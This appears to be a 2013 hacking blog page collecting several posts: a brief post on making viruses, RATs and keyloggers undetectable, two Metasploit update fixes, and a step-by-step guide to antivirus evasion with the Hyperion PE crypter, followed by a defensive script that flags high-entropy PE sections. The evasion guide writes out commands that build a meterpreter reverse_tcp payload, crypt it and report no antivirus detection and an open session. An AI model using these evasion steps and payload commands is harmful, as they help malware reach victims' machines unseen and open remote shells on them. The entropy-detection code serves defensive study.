Saturday 20 July 2013

How To Make your Viruses, Payloads, Rat, Key-logger, fully Undetectable From Anti-viruses

Hi To All The 

Requirements:-
1. BackTrack 5 or any Linux distro that has msfencode
2. Your own virus/RAT/keylogger engine (mine is test1.exe)
Follow the commands shown in the figure:-
Perform all steps with root permissions.

If you have any query, write it in the comments below.
We will try to figure it out.



Thursday 15 November 2012

Msfupdate not working with "no version information available" error by Shubham Mittal (@k@ Upgoingstaar)


A few days back, while working on my testing and research, I came across an error which was continuously preventing me from updating my Metasploit framework. The error message was something like this:


No version available and blah blah blah. I ignored it for a couple of days due to workload and downloaded exploits manually. But when that started to seem kiddish to me, I got to the root of it. I soon realized that the "no version information available" error here meant that the library Metasploit refers to has no version information, and hence it does not update to any further version. Quite kiddish, but realistic too. So I checked its libraries:


libssl.so.0.9.8 does not have a link in /usr/lib/, whereas the whole library actually relies on it. So what we need to do is:
1. Back up the library that is causing the msf error.
2. Create a link between the msf library and /usr/lib/

Do this (the commands were shown in the screenshot):

Once you are done with all this, go ahead and update your Metasploit. You will get a smile on your face.

So this is how you don't need to undo your actions when you get an error somewhere, as in the case of msf.

Enjoy hacking, enjoy exploitation. :)

Bypassing Antivirus with PE Crypters by Shubham Mittal (@k@ Upgoingstaar)

Well, most of the time when we do a penetration test we face a super cool AV protection which stops us from executing our lovely EXEs, shellcodes, etc.

I was looking into the same thing, and from a presentation by Mr. Dave Kennedy at DerbyCon I got something quite useful. He used words like "shellcodeexec" and "PE crypters". Digging here and there, I found that shellcodeexec is a small utility that injects shellcode into a process and executes it; the idea is that when there is no file at all, what signature will the AV match? However, shellcodeexec itself is getting caught nowadays, so I would not suggest going for it.

On the other hand, PE Crypters (from the nullsecurity team) encrypt a binary file with a clever crypting approach and can thus be used to bypass AV. The whole project runs under the name Hyperion and is a properly working way to mess with AVs. So let's start.

Well, AVs have become good at detecting the templates with which we encrypt our EXEs, and likewise the decryption routine the program uses to reach the actual offset; once AVs started matching those, the result was "Detection". In these PE crypters the payload is not scrambled; instead it is encapsulated. A different key is used as the cipher key every time, and at execution time it is brute forced. So it will take time, huh? Well, yeah, it will take time if the key is long. We keep the key short and everything goes fine. That, in short, is what the Hyperion PE crypter does: a weak 128-bit AES key is used to encapsulate the payload, and it is simply brute forced at execution time. If you want a more hardcore look, check out this research paper (http://www.exploit-db.com/wp-content/themes/exploit/docs/18849.pdf).

Anyway, for the super cool guys this was enough. But as only the source files are available for now, this can be a little troublesome for those who are new to these things :P, so let me give a walkthrough. First of all choose your platform; I prefer Linux all the way, but it's your system and your choice.

Next, download the project, or use:
wget http://nullsecurity.net/tools/binary/Hyperion-1.0.zip

Unzip it.

unzip Hyperion-1.0.zip

Change into the extracted directory and compile it (the g++ path depends on your wine prefix; by default the prefix is ~/.wine/drive_c):

cd Hyperion-1.0
wine /root/drive_c/MinGW/bin/g++ Src/Crypter/*.cpp -o shubham.exe

Once you have built the crypting executable, shubham.exe in this case, you can start playing around with EXEs. I am creating an msfpayload for a reverse connection; once it is crypted with Hyperion, it should bypass AV and still send back the reverse connection.

Create the payload.
msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.242.128 LPORT=4444 X > msf1.exe

Scan it.
Once the payload is ready, we scan it first (without crypting).

Let's crypt it with Hyperion.

wine shubham.exe /root/Desktop/msf1.exe /root/Desktop/msf2.exe
ls -l

Scan it.
No detection.

Execute it.
As soon as you execute it, it starts brute forcing, which pushes CPU usage to 100%.

Enjoy it.
As soon as the brute force is over, CPU usage drops back to normal and a session is generated.

I hope this was okay for you and you enjoyed it. My next post will be about another way to bypass antiviruses.

Stay focused & keep exploiting. :)
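The "Scan it: No detection" result above is what a signature scanner reports; the encapsulated payload can still be spotted statically, because AES output looks like near-uniform noise. The following script is an added example written from the defender's side (not code from the post or from the Hyperion project): it parses a PE's section table with struct and flags sections whose byte entropy is close to 8 bits. The sample image, its section names (".hyp" is a placeholder, not Hyperion's real layout) and the seeded pseudo-random bytes standing in for ciphertext are all constructed.

```python
import math
import random
import struct
from collections import Counter

def shannon_entropy(data: bytes) -> float:
    """Bits of entropy per byte: 0.0 for empty or constant data, 8.0 for uniform bytes."""
    if not data:
        return 0.0
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in Counter(data).values())

def pe_sections(image: bytes):
    """Yield (name, raw bytes) for each section, read straight from the PE headers."""
    if image[:2] != b"MZ":
        raise ValueError("not an MZ image")
    e_lfanew = struct.unpack_from("<I", image, 0x3C)[0]
    if image[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("PE signature not found")
    num_sections = struct.unpack_from("<H", image, e_lfanew + 6)[0]
    opt_size = struct.unpack_from("<H", image, e_lfanew + 20)[0]
    table = e_lfanew + 24 + opt_size  # first IMAGE_SECTION_HEADER (40 bytes each)
    for i in range(num_sections):
        name, _vsize, _va, raw_size, raw_ptr = struct.unpack_from("<8sIIII", image, table + 40 * i)
        yield name.rstrip(b"\0").decode("ascii", "replace"), image[raw_ptr:raw_ptr + raw_size]

def scan_image(image: bytes, threshold: float = 7.2):
    """Return [(section, entropy, suspicious)]; ciphertext sits near 8.0, plain code well below."""
    return [(name, round(shannon_entropy(data), 2), shannon_entropy(data) >= threshold)
            for name, data in pe_sections(image)]

def build_sample_pe(sections):
    """Constructed, non-loadable PE skeleton: DOS stub, COFF header, section table, raw data."""
    e_lfanew = 0x40
    hdr = bytearray(b"MZ" + b"\0" * 0x3A + struct.pack("<I", e_lfanew))
    hdr += b"PE\0\0" + struct.pack("<HHIIIHH", 0x14C, len(sections), 0, 0, 0, 0, 0)
    raw_ptr = e_lfanew + 24 + 40 * len(sections)  # raw data follows the section table
    body = b""
    for name, data in sections:
        hdr += struct.pack("<8sIIIIIIHHI", name.ljust(8, b"\0"), len(data), 0, len(data), raw_ptr, 0, 0, 0, 0, 0)
        raw_ptr += len(data)
        body += data
    return bytes(hdr) + body

# Constructed sample: a low-entropy "code" section, plus a section standing in for the
# AES-encapsulated payload (seeded pseudo-random bytes; ".hyp" is just a placeholder name).
rng = random.Random(1)
SAMPLE_SECTIONS = [(b".text", b"\x55\x8b\xec\x90\xc3" * 800),
                   (b".hyp", bytes(rng.getrandbits(8) for _ in range(4096)))]
```

Entropy is one heuristic among several; the 100% CPU burst during the key search that the post describes is a behavioural signal a sandbox can catch as well.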

MSF not updating: Working Copy '.' Locked. Suggestion for SVN

Welcome friends, I am posting a new tutorial by Shubham Mittal (@k@ upgoingstaar); his blog (must read):
http://3ncrypt0r.blogspot.in/
So get ready to be a g33k with him. Enjoy the tutorial...


Most of the time when we come across new exploits in the market and expect them in our msf instance, the framework gets stuck at some point while updating, and you have a reason for disappointment. You try some Googling, but it doesn't help, as most people on those forums, instead of answering, are fighting, arguing and posting lame things.

To solve this for newbies I am therefore writing this article; however, if you enjoy digging into things on your own (which is the best practice to make you conceptually strong, as I learnt from a highly experienced senior), this is not for you.

There can be a lot of reasons for not being able to update msf. One of them I covered in my last post:

http://3ncrypt0r.blogspot.in/2012/08/msfupdate-not-working-solution.html

The other one I am covering today.

Generally when we update we have to sit back for a long time as the update gets stuck; it comes back with an error which looks like this when you run msfupdate.

svn : Working copy '.' locked
svn : run 'svn cleanup' to remove locks (type 'svn help cleanup' for details)

Reason: SVN is not able to handle the situation.

What is SVN?

SVN is a program which keeps track of all the different versions of our source files. You can read about it on its Wikipedia page.


Solution:

It tries to resolve the issue on its own and suggests you run "cleanup" in the directory which is getting locked. If it works, congratulations! In most cases it will not work and you will see something like this:

In my case I was getting the error in the "/lib/gemcache/ruby/1.9.1/gems/activesupport-3.2.8/lib/active_support" directory.

I guessed it was getting locked at some file within the directory, but as the files don't appear in the folder while it is being synchronized with git, you can't delete that particular file. Better to remove the directory itself. So I deleted that particular directory:

I was a bit unlucky that day, so it didn't solve the situation. But we must not leave things unsolved: go through the error and try to figure it out. Again it was locked at some other directory:

So, without any laziness, delete it too.

As a precaution to avoid further error messages (I HATE ERRORS, seriously), run this:

Most probably you have figured it out by now, so try msfupdate now.

And perhaps this will give you a smile.

Suggestions and queries are always welcome.

KEEP EXPLOITING.